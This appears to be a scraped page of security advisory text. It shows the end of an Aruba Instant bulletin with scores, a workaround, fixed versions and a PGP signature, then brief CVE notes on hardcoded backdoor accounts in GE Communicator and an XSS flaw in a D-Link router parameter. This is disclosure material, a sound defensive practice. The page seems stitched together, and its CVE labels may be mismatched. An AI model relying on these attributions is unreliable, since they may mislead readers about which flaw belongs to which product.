MEDIUM CVSSv3 Overall Score: 6.4 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L Workaround: Administrators should make sure they log out of the Aruba Instant UI when not actively managing the system, and should use caution clicking links from external sources while logged into the IAP administrative interface. Discovery: This vulnerability was discovered and reported by Alessio Santoru of Horizon Security and reported through the Bugcrowd managed bug bounty program. It was also independently discovered and reported by Phil Purviance (@superevr). Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.0 Resolution ========== All reported vulnerabilities are fixed in the following Aruba Instant software releases: - Aruba Instant 6.4.4.8-4.2.4.12 - Aruba Instant 6.5.4.11 - Aruba Instant 8.3.0.6 - Aruba Instant 8.4.0.1 Revision History ================ Revision 1 / 2019-Feb-27 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products, obtaining assistance with security incidents is available at: http://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: http://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2019 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQEzBAEBCAAdFiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAlxu9h0ACgkQmP4JykWF htk1EggAjXFwvU7IDd0NDv3nLoOQEJypFUwd4G5IZoc26JJ7ngFnuP6UayWg8z5/ 64nIKmDDKvdjpO5OMgPdmm70RNYwq9PdMsR+r6vYyia1VSZEdFutEWtP5OWtAz3D 0jJSrVrhuzlg7Rb9uNEa4igzEoIOh1aWChx/ZrclO9DtaLIfROrkoRdqQhEoOB4/ 1kB+Q8N+CzyDfDY6Scj/KBdGXoNwU51KgadmyvlBLSXCXoGbvt5vZGYkovxmHGSc SkNG2JhwA4t4IGWdm/yEFIYtWFUkk48CXMT9LCovq20xjYgVwgY6vDDCfV73eqmU izAptFzANT4OSD3DpF9u0mgJTFyxoA== =M9QP -----END PGP SIGNATURE-----

CVE-2018-7082

GE Communicator, all versions prior to 4.0.517, contains two backdoor accounts with hardcoded credentials, which may allow control over the database. This service is inaccessible to attackers if Windows default firewall settings are used by the end user.

CVE-2019-6548

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php.

Tag

#backdoor